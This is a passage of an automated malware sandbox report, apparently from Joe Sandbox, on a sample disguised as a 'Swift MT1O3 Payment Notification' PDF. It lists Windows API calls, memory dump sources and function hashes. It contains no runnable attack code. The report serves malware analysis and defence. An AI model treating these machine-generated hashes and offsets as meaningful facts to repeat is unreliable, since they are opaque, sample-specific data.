                                                                                                                              • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                                                              APIs
                                                                                                                              • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                                              • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                                              • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                                              • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                                              • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                                              • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                                              • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                                              • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                                              • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                                              • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1744303182-0
                                                                                                                              • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                              • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                                                              • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                              • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                                                              APIs
                                                                                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 0046EE79
                                                                                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 0046F265
                                                                                                                              • IsWindow.USER32(?), ref: 0046F29A
                                                                                                                              • GetDesktopWindow.USER32 ref: 0046F356
                                                                                                                              • EnumChildWindows.USER32(00000000), ref: 0046F35D
                                                                                                                              • EnumWindows.USER32(0046130D,?), ref: 0046F365
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$EnumForegroundWindows$ChildDesktop
                                                                                                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                              • API String ID: 4293069593-1919597938
                                                                                                                              • Opcode ID: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                                                                                                              • Instruction ID: 15289122aec5319afe5b60ce0d71565fabc5791e0031d8771947120ab82528ab
                                                                                                                              • Opcode Fuzzy Hash: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                                                                                                              • Instruction Fuzzy Hash: 83F10B714143019BDB00FF61D885AAFB3A4BF85308F44496FF94567282E779E909CBA7
                                                                                                                              APIs
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseConnectCreateRegistry
                                                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                              • API String ID: 3217815495-966354055
                                                                                                                              • Opcode ID: ac972ac1d29c5b2a3736f685a5cc0fc59d65a7703e61b1c0a4b5b80c1baebce2
                                                                                                                              • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                                              • Opcode Fuzzy Hash: ac972ac1d29c5b2a3736f685a5cc0fc59d65a7703e61b1c0a4b5b80c1baebce2
                                                                                                                              • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                                              APIs
                                                                                                                              • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                                              • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                                              • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                                              • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                                              • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3869813825-0
                                                                                                                              • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                              • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                                                              • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                              • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                                              • GetFocus.USER32 ref: 0046A0DD
                                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost$CtrlFocus
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 1534620443-4108050209
                                                                                                                              • Opcode ID: a68f054cd08e19eee01d46ae75324ef61b8391a7566d0bfbb9ad8a8cce6789f6
                                                                                                                              • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                                              • Opcode Fuzzy Hash: a68f054cd08e19eee01d46ae75324ef61b8391a7566d0bfbb9ad8a8cce6789f6
                                                                                                                              • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                                              APIs
                                                                                                                              • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$CreateDestroy
                                                                                                                              • String ID: ,$tooltips_class32
                                                                                                                              • API String ID: 1109047481-3856767331
                                                                                                                              • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                              • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                                              • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                              • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                                              APIs
                                                                                                                              • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                                              • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                                              • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                                              • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                                              • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                                              • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                                              • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                                              • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                                              • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                                              • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                                              • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 1441871840-4108050209
                                                                                                                              • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                                                                              • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                                                              • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                                                                              • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                                                              APIs
                                                                                                                              • LoadLibraryW.KERNEL32(USER32.DLL,00496840,00000314,00000000), ref: 004200D7
                                                                                                                              • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 004200F3
                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00420111
                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00420121
                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 00420131
                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00420145
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                              • String ID: @hI$GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                                                                              • API String ID: 2238633743-2115754596
                                                                                                                              • Opcode ID: 7f62eed91bd5e8d9e4a5aee0760a84f379abbf056fbeb696d11cc0b2488c1ccd
                                                                                                                              • Instruction ID: 87ede4d0b4904396a69794b8bbcc3e401081f17338994847c77f403133c188a5
                                                                                                                              • Opcode Fuzzy Hash: 7f62eed91bd5e8d9e4a5aee0760a84f379abbf056fbeb696d11cc0b2488c1ccd
                                                                                                                              • Instruction Fuzzy Hash: 2F411C71A0031AABDB10ABB5AD89E6F7BF8AB54340F54043BA905E2351DB79D910CB68
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                                              • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                                              • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                                                • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                                                • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                                                • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue
                                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                              • API String ID: 2635119114-3819984048
                                                                                                                              • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                              • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                                                              • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                              • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                                                              APIs
                                                                                                                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                                                              • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                                                              • SendMessageW.USER32 ref: 00471740
                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                                                              • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                                                              • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                                                              • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                                                              • SendMessageW.USER32 ref: 0047184F
                                                                                                                              • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                                                              • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                                                              • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                                                              • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4116747274-0
                                                                                                                              • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                              • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                                                              • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                              • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                                                              APIs
                                                                                                                              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                                                              • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                                                              • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoItemMenu$Sleep
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 1196289194-4108050209
